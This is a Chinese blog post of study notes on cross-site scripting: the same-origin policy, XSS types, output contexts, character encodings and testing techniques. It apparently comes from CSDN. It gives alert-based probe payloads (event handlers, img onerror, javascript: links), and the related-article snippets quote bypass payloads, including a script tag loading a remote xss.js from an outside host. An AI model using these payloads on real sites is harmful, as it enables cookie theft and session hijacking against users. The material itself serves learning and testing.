xss漏洞的认知

最新推荐文章于 2023-04-30 14:42:20 发布
最新推荐文章于 2023-04-30 14:42:20 发布
阅读量641 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lizhiguoq/article/details/98458172
版权

**

xss漏洞的认知

**

XSS

同源策略

javaScript中的同源,需要对比 两者中的协议、域名、端口。三者完全相同才认为是同源的,否则即是来自不同源的内容。

Xss概念

恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
用户提交的数据没有过滤,或者过滤不严格,输出到网页中 ,导致可以构造执行JS代码,或者修改网页内容。

Xss危害

•盗取用户或者管理员的Cookie
• XSS Worm
• 挂马(水坑攻击)
• 有局限性的键盘记录

Xss分类

• 反射型
非持久型XSS。XSS代码出现在URL参数或者请求中,浏览器发出请求时,参数值作为输入提交到服务器,服务器接受处理后参数值出现在响应的HTML中,最后浏览器解析执行了这段XSS代码。
• 存储型
又称持久型XSS,他和反射型XSS最大的不同就是,攻击脚本将被永久地存放在目标服务器的数据库或文件中。
• DOM
与反射型XSS和存储型XSS的差别是在于DOM XSS的代码不需要服务器解析响应的直接参与,触发XSS靠的是浏览器DOM解析器的解析,可以完全认为是客户端的事情。
• flash
利用的是网页上flash文件缺陷来执行js脚本,一般是反射型xss

Xss输出点位置

• 输出在标签外:需要可以构造标签
• 输出到标签中
如果输出在"双引号或者’单引号内部,需要能够闭合引号,如果不能
闭合引号,看能否在当前的标签属性中执行js代码
如果没有输出在"双引号或者’单引号内部,或者可以闭合引号,可以构造新属性,使用新的属性的值来执行JS代码,如事件属性

• 输出到Script标签中
@ 如果输出在"双引号或者’单引号内部,需要能够闭合引号,
@ 如果不能闭合引号,需要看当前变量能不能innerHTML或者document.write,插入到网页中,如果可以就可以构造XSS,如果没有,就不存在XSS(引号内部可以使用unicode编码, < 不能编码)
@ 如果输出"双引号或者’单引号内部,需要能够闭合引号,如果可以闭合引号,就可以直接传递进去js代码,使用注释符号,注释掉后面的js代码就可以构造XSS

Xss输出点位置
• 基于黑名单的过滤和基于白名单的过滤。
• 在cookie中加入httponly属性可以在一定程度上保护用户的cookie,减
少出现XSS时损失
• (1,apache2.2.x;2.注册网站,把攻击者自己的加了httponly的cookie
复制过去,补全信息)
• Flash XSS的修复需要对相应的flash进行修改或升级替换。

常用编码

URL编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字。

%23 . %2e + %2b ! %21
< %3c > %3e 空格 %20 & %26
( %28 ) %29 “ %22 ‘ %27

HTML编码
HTML实体编码:&开头,分号结尾 如“<”编码为“<”
HTML10进制: “<”编码为<
HTML16进制: “<”编码为<
JavaScript编码:js提供了四种字符编码的策略
1、三个八进制数,如果不够个数,前面补0,例如“<”编码为“\074”
2、两个十六进制数,如果不够个数,前面补0,例如“<”编码为“\x3c”
3、四个十六进制数,如果不够个数,前面补0,例如“<”编码为“\u003c”
4、对于一些控制字符,使用特殊的C类型的转义风格(例如\n和\r)

xss漏洞测试方式

在<>中。xss漏洞如果输出在单引号或者双引号内需要能够闭合引号,如果不能闭合引号,就需要看能否在当前的标签中中执行js代码如果不能就不存在xss漏洞
列子:如果单引号被过滤了就试着直接进行js弹窗alert(1)如果不能执行js就不存在xss
用’去闭合能闭合就构造一个属性因为是input构造一个onfocus焦点的属性值后面加上js代码=‘alert(1)如果想自动获焦加上autofocus 12345’ autofocus οnfοcus='alert(1)
鼠标滑过:111’οnmοuseοver='alert(111)
方法二:单引号或者双引号被过滤使用<>判断使用unicode编码,八进制和十六进制都可以 注:<>在unicode不能转
弹窗的第二种方法: < img src=1 οnerrοr=alert()>
弹窗的第三种方法:< a href=“javascript:alert(1)”>click
先用’判断能否闭合. '能闭合就把value属性中的值进一步提升,让存在于input标签中通过js代码检测是否存在xss
对于多余标签的闭合使用//去注释掉 注: ’ or 1 #
$request既可以接受get也可以接受post传来的值
html实体编码:
支持十进制,十六进制和jsunicode
javascript(伪协议):
支持jsunicode,js八进制和就是十六进制
eval(),setTimeout(),setInterval()以上都是会将字符串当做js代码执行的函数

alllt
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全培训方案(1).doc
07-09
深入理解SQL注入漏洞的原理,以及如何利用上传漏洞、命令执行漏洞XSS漏洞等常见Web漏洞进行攻击。此外,学生还将掌握权限提升技巧和第三方插件/程序的漏洞利用。 虽然目前尚无正式的考试和证书颁发机制,但安云...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2862
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
Xss漏洞拦截处理
pshaoyi的专栏
02-17 6387
描述 XSS(跨站脚本攻击) 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 思路 基于filter拦截,将特殊字符替换为html转意字符 (如: "<" 转意为 "&lt;") , 需要拦截的点如下: 请求头.
XSS过滤绕过
qq_39654116的博客
01-17 4597
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
xss过滤绕过方法总结
jinhezhai的博客
09-15 1万+
xss注入常用语句、 1.<script>alert(1)</script> 2.<img src="#" onmouseover="alert(11)"> 3.<img src="#" onerror="alert('xss')"> 4.<svg onload=alert(1)> 5.<a href=javascript:alert(1)> 1.尝试双写绕过 2.大小写绕过、 3.js编码#unicode js的一种编码方式。 4.h
xss
xmas
05-10 652
http://www.phishtank.com/     https://developers.google.com/safe-browsing/v4/lookup-api?hl=zh-CN    safebrowsingapi [http://www.baidu.com] www.google.com\abc parse \ to
走向内网的邪恶之路
08-29
- **SQL注入与XSS结合**:利用SQL注入漏洞执行命令,并通过XSS将结果发送回来,这种方法尤其适用于那些能够执行XSS的环境。 #### 五、总结与展望 “走向内网的邪恶之路”展示了如何通过创新的思维方式和技术手段,...
有关网络安全的外文论文
06-23
- **危害**:CSV漏洞可能导致各种攻击,包括但不限于XSS(跨站脚本攻击)、DOM-based XSS、数据泄露、恶意脚本注入等。 #### 三、CSV漏洞的流行性 - **实证研究**:研究提供了实证证据表明CSV漏洞不仅仅是理论上的...
网络安全意识与案例分析y240221.pptx
最新发布
02-21
网络安全意识是指用户对于互联网环境中可能遇到的各种安全风险的认知程度。随着信息技术的发展,网络已经成为人们工作、学习和生活中不可或缺的一部分。然而,这也使得网络环境下的安全问题变得日益突出。提高网络...
XSS绕过总结
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
XSS漏洞基础
m0_62092622的博客
01-22 2676
概念 XSS,跨站脚本攻击 (Cross Site Scripting),是一种经常出现在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括 HTML 代码和客户端脚本。 攻击者利用 XSS 漏洞旁路掉访问控制——例如同源策略 (same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的 phishing 攻击而变得广为人知。 对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的 “缓冲区溢出攻击 “,而 Jav
【安全】P 4-23 编码转义介绍
Z_David_Z的博客
02-21 423
目录0X01 URL编码0X02 html编码0X03 JavaScript编码0X04 编码含义 0X01 URL编码 url的设计者,考虑到安全传输问题,防止url字符丢失,所以选用了相对较小的、通用的安全字母表。另一方面,url的设计者希望url是完整的,有时候需要url中包含除去通用安全字母表之外的二进制数据和字符(比如中文)。所以url引入了一种转义机制,将不安全的字符编码为安全字符再进行传输。 百分号编码:url编码包含一个百分号(%),后面跟着两个表示字符ASCII码的十六进制数。例如:空格转
XSS绕过单引号限制
Vicl1fe的博客
04-20 4294
前言 一个朋友突然问我xss闯关第三关如何反弹cookie。自己研究了一下确实不是太简单。记个笔记在此。 有网上在线的xss闯关。也可以去下载一下 第三关 xss在出现在keyword参数上。用的是单引号闭合的。 看源码可以看到用什么闭合的。但是你f12看的时候是双引号,实际是单引号。所以我觉得这里还是要猜一下。也好猜。不是单引号就是双引号了。 看下图。 1、这个靶场似乎没有cookie。我自己...
2、XSS
Poolhuang的博客
06-13 698
反射型XSS 1、XSS原理 用户输入的数据当做HTML代码拼接到程序代码中去执行恶意的JS语句; 2、反射型XSS 反射型跨站脚本(Reflected Cross-Site Scripting)是最常见,也是使用最广的一种,可将恶意脚本附加到 URL 地址的参数中。反射型 XSS 的利用一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地
XSS绕过技术
热门推荐
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
XSS绕过和防御总结
m0_72324809的博客
04-30 735
<a xlink:href= javascript:alert(1)>1</a>
XSS 绕过指南
weixin_51681694的博客
04-22 1460
因为各种原因,在此总结一下网络上的绕过方法以及个人的经验,会不断更新,若有错误请私信
xss绕过尖括号和双括号_XSS绕过filter高级技术part1
weixin_29903043的博客
12-23 1366
在如今的web时代,XSS攻击十分常见,针对xss攻击的防御也有不少,Filter就是一种用来防御xss攻击的最常见的手段,filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此,依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同,绕过的难易程度肯定也不同,这些简单的过滤器还是比较容易绕过的,只要做一些基本...
XSS绕过经验总结
weixin_46622976的博客
10-20 2128
XSS经验总结
DOM型XSS漏洞测试payload大全
XSS漏洞 DOM型测试 payload代码” 在网络安全领域,XSS(Cross-Site Scripting)漏洞是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而控制用户与网站的交互。DOM型XSSXSS漏洞的一种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值